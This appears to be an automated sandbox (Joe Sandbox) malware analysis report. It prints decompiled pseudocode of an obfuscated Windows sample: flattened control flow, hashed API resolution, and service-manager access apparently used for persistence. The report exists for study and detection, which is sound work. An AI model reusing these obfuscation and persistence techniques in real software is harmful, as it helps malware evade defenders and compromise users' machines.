									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x2ae29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x2ae29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x2ade08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x2ade08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x2ae494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x2ae494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x2adf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x2adf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x2ae494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x2ae494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x2adf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x2adf30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x2ae270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x2ae270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x2ae200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x2ae200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E002A42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x002a5047
                                                                                0x002a504b
                                                                                0x002a504d
                                                                                0x002a5051
                                                                                0x002a5053
                                                                                0x002a5057
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a5060
                                                                                0x002a5060
                                                                                0x002a5060
                                                                                0x002a5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a51af
                                                                                0x002a51b5
                                                                                0x002a52f9
                                                                                0x002a52ff
                                                                                0x00000000
                                                                                0x002a5301
                                                                                0x002a5301
                                                                                0x002a5306
                                                                                0x002a5308
                                                                                0x002a531b
                                                                                0x002a5320
                                                                                0x002a5320
                                                                                0x002a5327
                                                                                0x002a532e
                                                                                0x002a5330
                                                                                0x002a5348
                                                                                0x002a5348
                                                                                0x002a5355
                                                                                0x002a5357
                                                                                0x002a5359
                                                                                0x002a535b
                                                                                0x002a535d
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a535b
                                                                                0x002a51bb
                                                                                0x002a51bb
                                                                                0x002a5277
                                                                                0x002a527c
                                                                                0x002a527e
                                                                                0x002a5291
                                                                                0x002a5296
                                                                                0x002a5296
                                                                                0x002a52ac
                                                                                0x002a52b0
                                                                                0x002a52b2
                                                                                0x002a52bd
                                                                                0x002a52c3
                                                                                0x002a52c5
                                                                                0x002a52d8
                                                                                0x002a52dd
                                                                                0x002a52dd
                                                                                0x002a52e6
                                                                                0x00000000
                                                                                0x002a51c1
                                                                                0x002a51c1
                                                                                0x002a51c7
                                                                                0x002a526d
                                                                                0x00000000
                                                                                0x002a51cd
                                                                                0x002a51cd
                                                                                0x002a51d3
                                                                                0x002a52e8
                                                                                0x002a52e8
                                                                                0x002a52ee
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a51d9
                                                                                0x002a51d9
                                                                                0x002a51de
                                                                                0x002a51e0
                                                                                0x002a51f3
                                                                                0x002a51f8
                                                                                0x002a51f8
                                                                                0x002a521b
                                                                                0x002a521d
                                                                                0x002a521f
                                                                                0x002a50ef
                                                                                0x002a50ef
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a5225
                                                                                0x002a5225
                                                                                0x002a522a
                                                                                0x002a522c
                                                                                0x002a523f
                                                                                0x002a5244
                                                                                0x002a5244
                                                                                0x002a5249
                                                                                0x002a524e
                                                                                0x002a525b
                                                                                0x002a525d
                                                                                0x002a525f
                                                                                0x002a5261
                                                                                0x002a5265
                                                                                0x00000000
                                                                                0x002a5265
                                                                                0x00000000
                                                                                0x002a521f
                                                                                0x002a51d3
                                                                                0x002a51c7
                                                                                0x002a51bb
                                                                                0x002a53c0
                                                                                0x002a53c0
                                                                                0x00000000
                                                                                0x002a53c0
                                                                                0x002a506c
                                                                                0x002a5367
                                                                                0x002a536c
                                                                                0x002a536e
                                                                                0x002a5381
                                                                                0x002a5386
                                                                                0x002a5386
                                                                                0x002a538d
                                                                                0x002a538f
                                                                                0x002a5394
                                                                                0x002a5396
                                                                                0x002a53a9
                                                                                0x002a53ae
                                                                                0x002a53ae
                                                                                0x00000000
                                                                                0x002a53b7
                                                                                0x002a5072
                                                                                0x002a5078
                                                                                0x002a50f9
                                                                                0x002a50ff
                                                                                0x002a5153
                                                                                0x002a5158
                                                                                0x002a515a
                                                                                0x002a516d
                                                                                0x002a5172
                                                                                0x002a5172
                                                                                0x002a5179
                                                                                0x002a517b
                                                                                0x002a5180
                                                                                0x002a5182
                                                                                0x002a5195
                                                                                0x002a519a
                                                                                0x002a519a
                                                                                0x002a51a3
                                                                                0x002a51a5
                                                                                0x00000000
                                                                                0x002a5101
                                                                                0x002a5101
                                                                                0x002a5107
                                                                                0x00000000
                                                                                0x002a510d
                                                                                0x002a510d
                                                                                0x002a5112
                                                                                0x002a5114
                                                                                0x002a5127
                                                                                0x002a512c
                                                                                0x002a512c
                                                                                0x002a5139
                                                                                0x002a513b
                                                                                0x002a513d
                                                                                0x002a514b
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a5107
                                                                                0x002a507a
                                                                                0x002a507a
                                                                                0x002a50c2
                                                                                0x002a50c7
                                                                                0x002a50c9
                                                                                0x002a50dc
                                                                                0x002a50e1
                                                                                0x002a50e1
                                                                                0x002a50ed
                                                                                0x00000000
                                                                                0x002a507c
                                                                                0x002a5082
                                                                                0x002a50ad
                                                                                0x002a50b0
                                                                                0x002a50b2
                                                                                0x002a50ba
                                                                                0x00000000
                                                                                0x002a5084
                                                                                0x002a508a
                                                                                0x00000000
                                                                                0x002a5090
                                                                                0x002a509a
                                                                                0x002a50a8
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x00000000
                                                                                0x002a505c
                                                                                0x002a505c
                                                                                0x002a508a
                                                                                0x002a5082
                                                                                0x002a507a
                                                                                0x00000000
                                                                                0x002a5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,002A8AC8,?,3251FEFE,?,?), ref: 002A5355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c46978bacf8461c206813eba88a889aed9b09a811142ac6ddb16c92cadc45775
                                                                                • Instruction ID: fd4e961c6fbc4c3de89c40410c8408d3a8fdf48aca9bc713c8dfd31ce657cfe1
                                                                                • Opcode Fuzzy Hash: c46978bacf8461c206813eba88a889aed9b09a811142ac6ddb16c92cadc45775
                                                                                • Instruction Fuzzy Hash: 4F81F532B307225BDF14EF789C9572B76DAABA7744F420429F816DB291EE708D214BC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E002A9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x2ae310;
							if( *0x2ae310 == 0) {
								 *0x2ae310 = E002A3E60(_t64, E002A3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x2ae54c; // 0x30dfb0
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x2adbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E002A3E60(_t64, E002A3F00(0xd9518805), 0x141622d6, _t94);
										 *0x2adbd8 = _t69;
									}
									_t53 =  *0x2ae54c; // 0x30dfb0
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E002A7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x2ae3f4;
											if(_t60 == 0) {
												_t60 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x2ae3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E002A3D00( &_v536);
											_t72 =  *0x2ae54c; // 0x30dfb0
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x2adbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E002A3E60(_t64, E002A3F00(0xd9518805), 0x141622d6, _t94);
								 *0x2adbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x2ae54c; // 0x30dfb0
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E002A3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x2ae494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x2ae494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x2add18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E002A3E60(_t64, E002A3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x2add18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x2ae54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E002A7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x2ae18c;
								if( *0x2ae18c == 0) {
									 *0x2ae18c = E002A3E60(_t64, E002A3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x2ae54c; // 0x30dfb0
									 *((intOrPtr*)(_t47 + 8)) = 0x2a7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x002a9868
                                                                                0x002a986a
                                                                                0x002a9871
                                                                                0x002a9875
                                                                                0x002a9875
                                                                                0x002a9878
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9880
                                                                                0x002a9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a988b
                                                                                0x002a9993
                                                                                0x002a9995
                                                                                0x002a99ad
                                                                                0x002a99ad
                                                                                0x002a99bb
                                                                                0x002a99bd
                                                                                0x002a99bf
                                                                                0x002a99c1
                                                                                0x002a99d8
                                                                                0x002a99c3
                                                                                0x002a99c3
                                                                                0x002a99c8
                                                                                0x002a99ce
                                                                                0x002a99ce
                                                                                0x00000000
                                                                                0x002a9891
                                                                                0x002a9891
                                                                                0x002a9896
                                                                                0x002a9936
                                                                                0x002a993b
                                                                                0x00000000
                                                                                0x002a9941
                                                                                0x002a9941
                                                                                0x002a9947
                                                                                0x002a9949
                                                                                0x002a9961
                                                                                0x002a9963
                                                                                0x002a9963
                                                                                0x002a9969
                                                                                0x002a997d
                                                                                0x002a997f
                                                                                0x002a9981
                                                                                0x002a9986
                                                                                0x00000000
                                                                                0x002a9986
                                                                                0x002a989c
                                                                                0x002a989c
                                                                                0x002a9927
                                                                                0x002a992c
                                                                                0x00000000
                                                                                0x002a98a2
                                                                                0x002a98a7
                                                                                0x002a9905
                                                                                0x002a990d
                                                                                0x002a9912
                                                                                0x002a991a
                                                                                0x00000000
                                                                                0x002a98a9
                                                                                0x002a98ae
                                                                                0x00000000
                                                                                0x002a98b4
                                                                                0x002a98b4
                                                                                0x002a98bb
                                                                                0x002a98ce
                                                                                0x002a98d3
                                                                                0x002a98d3
                                                                                0x002a98e4
                                                                                0x002a98ea
                                                                                0x002a98ef
                                                                                0x002a98f5
                                                                                0x002a98fb
                                                                                0x00000000
                                                                                0x002a98fb
                                                                                0x002a98ae
                                                                                0x002a98a7
                                                                                0x002a989c
                                                                                0x002a9896
                                                                                0x00000000
                                                                                0x002a988b
                                                                                0x002a99e2
                                                                                0x002a99e7
                                                                                0x002a9ae3
                                                                                0x002a9ae8
                                                                                0x002a9b02
                                                                                0x002a9b07
                                                                                0x002a9b09
                                                                                0x002a9b1c
                                                                                0x002a9b21
                                                                                0x002a9b21
                                                                                0x002a9b33
                                                                                0x002a9b35
                                                                                0x002a9b3e
                                                                                0x002a9b3e
                                                                                0x002a9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a99ed
                                                                                0x002a99ed
                                                                                0x002a9a73
                                                                                0x002a9a78
                                                                                0x002a9a7a
                                                                                0x002a9a8d
                                                                                0x002a9a92
                                                                                0x002a9a92
                                                                                0x002a9a99
                                                                                0x002a9a9b
                                                                                0x002a9aa0
                                                                                0x002a9aa2
                                                                                0x002a9ab5
                                                                                0x002a9aba
                                                                                0x002a9aba
                                                                                0x002a9ac7
                                                                                0x002a9ac9
                                                                                0x002a9ace
                                                                                0x002a9ad0
                                                                                0x002a9b4f
                                                                                0x002a9b58
                                                                                0x002a9ad2
                                                                                0x002a9ad2
                                                                                0x002a9ad9
                                                                                0x00000000
                                                                                0x002a9ad9
                                                                                0x002a99f3
                                                                                0x002a99f3
                                                                                0x002a99f8
                                                                                0x002a9a47
                                                                                0x002a9a49
                                                                                0x002a9a61
                                                                                0x002a9a61
                                                                                0x002a9a67
                                                                                0x002a9a69
                                                                                0x00000000
                                                                                0x002a99fa
                                                                                0x002a99fa
                                                                                0x002a99ff
                                                                                0x00000000
                                                                                0x002a9a05
                                                                                0x002a9a05
                                                                                0x002a9a0d
                                                                                0x002a9a12
                                                                                0x002a9a17
                                                                                0x002a9a1f
                                                                                0x002a9a24
                                                                                0x002a9a2c
                                                                                0x002a9a31
                                                                                0x002a9a38
                                                                                0x00000000
                                                                                0x002a9a38
                                                                                0x002a99ff
                                                                                0x002a99f8
                                                                                0x002a99ed
                                                                                0x00000000
                                                                                0x002a9aea
                                                                                0x002a9aea
                                                                                0x002a9aea
                                                                                0x002a9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0030DF98), ref: 002A997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 002A99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 002A9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 002A9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: 2e18185cd3154a5dd61c86cb8db0e15c2381114c22b56ebca087251d8c8639f7
                                                                                • Instruction ID: 1fe3f89c0f729bd0902fe92822323e5fb52e366d9226211694bd44ecce7f8a24
                                                                                • Opcode Fuzzy Hash: 2e18185cd3154a5dd61c86cb8db0e15c2381114c22b56ebca087251d8c8639f7
                                                                                • Instruction Fuzzy Hash: A961F930B243025BDB14EF69AC8976A7395DBA3708F10441DF146DB251EE70CD558BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 2a8400-2a84df 106 2a84e3-2a84e9 105->106 107 2a85c8-2a85ce 106->107 108 2a84ef 106->108 109 2a8630-2a8637 107->109 110 2a85d0-2a85d6 107->110 111 2a866c-2a86b4 call 2ab6e0 108->111 112 2a84f5-2a84fb 108->112 118 2a8639-2a864f call 2a3f00 call 2a3e60 109->118 119 2a8654-2a8667 109->119 113 2a85d8-2a85e0 110->113 114 2a85b1-2a85b7 110->114 120 2a85bd-2a85c7 111->120 133 2a86ba 111->133 115 2a854a-2a8551 112->115 116 2a84fd-2a8503 112->116 123 2a85e2-2a85fa call 2a3f00 call 2a3e60 113->123 124 2a8600-2a8624 CreateFileW 113->124 114->106 114->120 121 2a856e-2a8591 115->121 122 2a8553-2a8569 call 2a3f00 call 2a3e60 115->122 125 2a8543-2a8548 116->125 126 2a8505-2a850b 116->126 118->119 119->106 148 2a85ae 121->148 149 2a8593-2a85a9 call 2a3f00 call 2a3e60 121->149 122->121 123->124 124->120 134 2a8626-2a862b 124->134 125->106 126->114 132 2a8511-2a8518 126->132 139 2a851a-2a8530 call 2a3f00 call 2a3e60 132->139 140 2a8535-2a8541 132->140 142 2a86bc-2a86be 133->142 143 2a86c4-2a86d1 133->143 134->106 139->140 140->106 142->120 142->143 148->114 149->148
                                                                                C-Code - Quality: 66%
                                                                                			E002A8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E002AB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x2adec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E002A3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E002A3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x2adec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x2ade3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E002A3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E002A3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x2ade3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x2ae1d4;
										if(_t93 == 0) {
											_t97 = E002A3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E002A3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x2ae1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x2ae3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E002A3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E002A3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x2ae3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x2ade04;
							if( *0x2ade04 == 0) {
								_t95 = E002A3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x2ade04 = E002A3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x002a8400
                                                                                0x002a8400
                                                                                0x002a8406
                                                                                0x002a840e
                                                                                0x002a8416
                                                                                0x002a841e
                                                                                0x002a8426
                                                                                0x002a842b
                                                                                0x002a8430
                                                                                0x002a8438
                                                                                0x002a8440
                                                                                0x002a8445
                                                                                0x002a844a
                                                                                0x002a8452
                                                                                0x002a845a
                                                                                0x002a8462
                                                                                0x002a846a
                                                                                0x002a8472
                                                                                0x002a847a
                                                                                0x002a8482
                                                                                0x002a8491
                                                                                0x002a8496
                                                                                0x002a849a
                                                                                0x002a84a2
                                                                                0x002a84af
                                                                                0x002a84b3
                                                                                0x002a84bb
                                                                                0x002a84c3
                                                                                0x002a84cb
                                                                                0x002a84cf
                                                                                0x002a84d7
                                                                                0x002a84df
                                                                                0x002a84df
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e3
                                                                                0x002a84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a84ef
                                                                                0x002a866e
                                                                                0x002a8676
                                                                                0x002a8696
                                                                                0x002a869a
                                                                                0x002a86a2
                                                                                0x002a86a6
                                                                                0x002a86aa
                                                                                0x002a86b2
                                                                                0x002a86b4
                                                                                0x00000000
                                                                                0x002a86ba
                                                                                0x002a86ba
                                                                                0x002a86c5
                                                                                0x002a86d1
                                                                                0x002a86bc
                                                                                0x002a86bc
                                                                                0x002a86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a86be
                                                                                0x002a86ba
                                                                                0x002a84f5
                                                                                0x002a84fb
                                                                                0x002a854a
                                                                                0x002a854f
                                                                                0x002a8551
                                                                                0x002a8558
                                                                                0x002a855d
                                                                                0x002a8564
                                                                                0x002a8569
                                                                                0x002a8569
                                                                                0x002a8578
                                                                                0x002a857c
                                                                                0x002a857e
                                                                                0x002a8589
                                                                                0x002a858f
                                                                                0x002a8591
                                                                                0x002a8598
                                                                                0x002a859d
                                                                                0x002a85a4
